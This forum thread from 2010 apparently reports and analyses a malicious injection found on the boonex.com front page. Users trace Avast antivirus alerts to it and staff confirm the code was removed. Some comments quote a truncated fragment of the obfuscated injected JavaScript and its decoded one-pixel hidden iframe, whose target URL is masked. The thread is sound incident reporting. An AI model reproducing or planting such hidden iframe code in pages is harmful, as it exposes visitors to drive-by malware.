Avast: Trojan Horse Alert @boonex.com

CodeSatori posted 16th of May 2010 in Community Voice. 26 comments.

Avast Antivirus has just alerted me to three instances of Trojan Horse at www.boonex.com front page. This is a javascript/iframe/java based exploit placed somewhere into Boonex.com code or templates.

Someone should investigate this immediately. If it's a false positive, it should be reported to Avast for the next virus definition update. (Update: This is a confirmed iframe/trojan exploit, see comments for detail.) If someone else receives an alert, please look at the logs and report the URLs of the affected pages, along with your virus software brand.

Until this is resolved, suggest turning javascript off in your browser, or otherwise being double sure your virus protection and browser choice are up to standard. The exploit itself depends on a Java applet, so turning Java off at boonex.com is a good idea too.

So far Unity seems to be unaffected, while several other areas cause the alerts below.

Avast Report:

16.5.2010 22:59:44    http://www.boonex.com/ [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:48    http://www.boonex.com/livehelp/include/javascript.php [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:53    http://www.boonex.com/livehelp/locale/en/images/InitateChat.png [L] HTML:IFrame-NO [Trj] (0)

While the last two are reported, the files themselves don't seem to exist. The only infection I can see is the obfuscated javascript at the bottom of the HTML, creating an iframe that links to a malware server.

Screenshots:

Boonex Trojan Iframe

Boonex Trojan Chat

Comments

Newest

·Oldest

·Top

Please login to post a comment.

CodeSatori

CodeSatori•16th of May 2010

Here is the snippet that seems to be connected with the alert on the front page:



<script language="JavaScript" type="text/JavaScript" src="http://www.boonex.com/livehelp/include/javascript.php"></script>
<!-- END stardevelop.com Live Help see more

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•16th of May 2010

It would appear that this issue occurs when accessing a web site running the LiveZilla online support software. This is most likely an issue with Avast! and not any malicious software.

Since no malware has ever been written for the BeOS, I'm safe from all forms of threats. Ha ha.

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•16th of May 2010

Other areas appear to be affected too. Suggest you refrain from dealing with anything critical here, including your member account settings and any commercial transactions, until this issue is clarified, to avoid possibly compromising your account/assets.

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•16th of May 2010

It would appear that BoonEx has now removed their installation of LiveZilla from the web server. It is not clear at this time whether or not this was due to the current issue with Avast!.

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•16th of May 2010

Edit: I don't know why I was thinking this was LiveZilla. All the Dolphin web sites using it must have gotten to me. Scrap everything I said, but this appears to be an issue with Avast!, nevertheless. I should note that BoonEx has indeed removed Live Help from their web server.

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•16th of May 2010

There's a bunch of livehelp code on the front page all the same... This is what I get when I view the generated source:



<div id="floatLayer" align="left" style="position:absolute; left:10px; top:10px; visibility:hidden; z-index:5000;">
<map see more

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•16th of May 2010

Okay, here's what kills it. At the very bottom of the source...

<script language=JavaScript>
var uwdblfsaodg = 'sYLYnyre3csYLYnyre69sYLYnyre66';var welvbvsnxdg = 'sYLYnyre72';var vmxygonhnmd = 'sYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre20sYLYnyre6esYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre3dsYLYnyre22';var poowgoljvco = 'sYLYnyre75sYLYnyre6fsYLYnyre75sYLYnyre6esYLYnyre61sYLYnyre71sYLYnyre70sYLYnyre67sYLYnyre77sYLYnyre68sYLYnyre77';var qxqcqdatksf = 'sYLYnyre22sYLYnyre20sYLYnyre77sYLYnyre69sYLYnyre64sYLYnyre74sYLYnyre68sYLYnyre3dsYLYnyre22sYLYnyre31sYLYnyre22sYLYnyre20sYLYnyre68sYLYnyre65sYLYnyre69sYLYnyre67sYLYnyre68sYLYnyre74sYLYnyre3dsYLYnyre22sYLYnyre30sYLYnyre22';var see more

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•16th of May 2010

If you want to see the full source HTML of the current front page without triggering alerts, see below:

http://www.codesatori.com/test/boonex_source.php

And here's an archived version where you can look up the javascript after it (hopefully) gets removed:

http://www.codesatori.com/test/boonex_source.html

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•16th of May 2010

So it would appear. I just check that link at the bottom, but 174.34.135.37 alone leads to 404 error. However, this IP address seems to be linked to malware web sites.

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•16th of May 2010

When you clear up the rudimentary obfuscation, the javascript reads as follows:

<iframe name="uounaqpgwhw" width="1" height="0" src="http://********************" marginwidth="1" marginheight="0" title="uounaqpgwhw" scrolling="no" border="0" frameborder="0"></iframe>

So it's a classic iframe insertion hack there. Now let's patch up those systems!

The URL in the script currently see more

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•16th of May 2010

I agree, this no longer appears to be an issue with Avast!. But for us BeOS users, need we worry about this (he he)?

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•16th of May 2010

Here's a further gloss on where the trail leads: http://www.codesatori.com/test/jsunpack_report.html

You can see that /phixnew/index.php at the above URL contains some sort of Java applet based exploit, while another URL under the same path is an ActiveX based trojan.

And BeOS is like a cabin in the woods.... No crime to worry about, but then again not much else either. It's very safe however! =)

Permalink•Reply•Plus•0 pluses

houstonlively

houstonlively•16th of May 2010

I would like to propose a theory that Boonex is fully aware of this, and that it is part of their evil plan to control all of us.

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•16th of May 2010

@houstonlively: Actually, it's just AlexT. Andrew and co. are unaware of what true evil lurks behind the doors of the house on 509 Drury Lane.

Permalink•Reply•Plus•0 pluses

AlexT

AlexT•16th of May 2010

Virus was removed from boonex site, now we are investigating this issue.

Permalink•Reply•Plus•0 pluses

AlexT

AlexT•16th of May 2010

@houstonlively
we have a different plan .. to not allow anyone to control you :)

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•16th of May 2010

@AlexT: That's good to hear. Both the malware and your plan, that is.

Permalink•Reply•Plus•0 pluses

GalwayWizard•17th of May 2010

Good job there and a simple thanks would do for alerting this issue, spending time off from W dev to confirm it and helping out :P

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•17th of May 2010

I did get thanks over e-mail from Julia and Alex when I reported this in.

I like to think this was an automated exploit, but given that it rolled in on Sunday (which is when staff is rarely around here), and given that this site runs on proprietary software, it may also be a targeted exploit attempt.

Permalink•Reply•Plus•0 pluses

Nathan Paton

Nathan Paton•17th of May 2010

@CodeSatori: I envy you. What do I need to do to get an email from AlexT?

Permalink•Reply•Plus•0 pluses

cbassthefish

cbassthefish•17th of May 2010

@magnussoft: I would prefer one from Julia :P

Permalink•Reply•Plus•0 pluses

pierrehs

pierrehs•17th of May 2010

I had the same virus with firefox and avast

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•17th of May 2010

The e-mails were of course in response to my e-mail to them (all relevant Boonex addresses) to cut down the lag it takes for someone to figure out there's an urgent issue ongoing.

Permalink•Reply•Plus•0 pluses

mychillspot

mychillspot•17th of May 2010

wow i got this too i wasnt sure if it was boonex or another site i was on.

Permalink•Reply•Plus•0 pluses

DosDawg

DosDawg•18th of May 2010

good find codesatori and good reporting. you too magnussoft.

AlexT, good job in getting it removed. So was there a patch you had to implment, and if so which i would think there was, when are you going to release that patch so that the thousands of sites that are running this platform can utilize that security patch?

Regards,
DosDawg

Permalink•Reply•Plus•0 pluses

CodeSatori

CodeSatori•18th of May 2010

@DosDawg: The only thing to do in fixing this this was removing the exploit Javascript from the bottom of the page. The real question is, how did it get there? I haven't heard any reports on that as of yet.

My educated guess is that either 1) someone was able to modify Boonex.com templates due to a public vulnerability in a template/templating file (which is the better case), or 2) someone gained administrator level access to the site and did it (which is the worse case). In either case, it would see more

Permalink•Reply•Plus•0 pluses